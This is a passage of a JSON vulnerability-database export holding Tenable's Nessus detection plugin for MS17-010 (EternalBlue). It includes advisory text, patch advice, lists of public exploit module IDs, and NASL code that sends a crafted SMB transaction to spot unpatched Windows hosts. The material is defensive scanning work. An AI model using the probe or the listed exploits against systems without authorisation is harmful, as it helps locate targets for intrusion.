"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?234f8ef8", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?4c7e0cf3", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://www.nessus.org/u?065561d0", "https://github.com/stamparm/EternalRocks/", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "http://www.nessus.org/u?b9d9ebf9", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?8dcab5e4", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-12T14:06:24", "history": [], "viewCount": 7179, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": 
["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96705", "SMNTC-96706", 
"SMNTC-96704", "SMNTC-96709", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-12T14:06:24", 
"rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2021-10-12T14:06:24", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain 
requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # 
https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. 
For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t 
raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! 
isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft recommends that users discontinue the use of SMBv1. SMBv1 lacks security features that were included in later SMB versions. SMBv1 can be disabled by following the vendor instructions provided in Microsoft KB2696547. Additionally, US-CERT recommends that users block SMB directly by blocking TCP port 445 on all network boundary devices. 
For SMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137 / 138 on all network boundary devices.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.8"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-10-12T14:06:24", "differentElements": ["vpr"], "edition": 11}, {"bulletin": {"id": "MS17-010.NASL", "hash": "59a3f59c439bc2d52437908b8868f320", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. 
WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2020-10-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?234f8ef8", "http://www.nessus.org/u?4c7e0cf3", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?065561d0", "http://www.nessus.org/u?68fc8eff", "http://www.nessus.org/u?8dcab5e4", "http://www.nessus.org/u?b9d9ebf9"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-18T12:44:33", "history": [], "viewCount": 7179, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": 
["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96706", 
"SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": 
"2021-10-18T12:44:33", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2021-10-18T12:44:33", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n 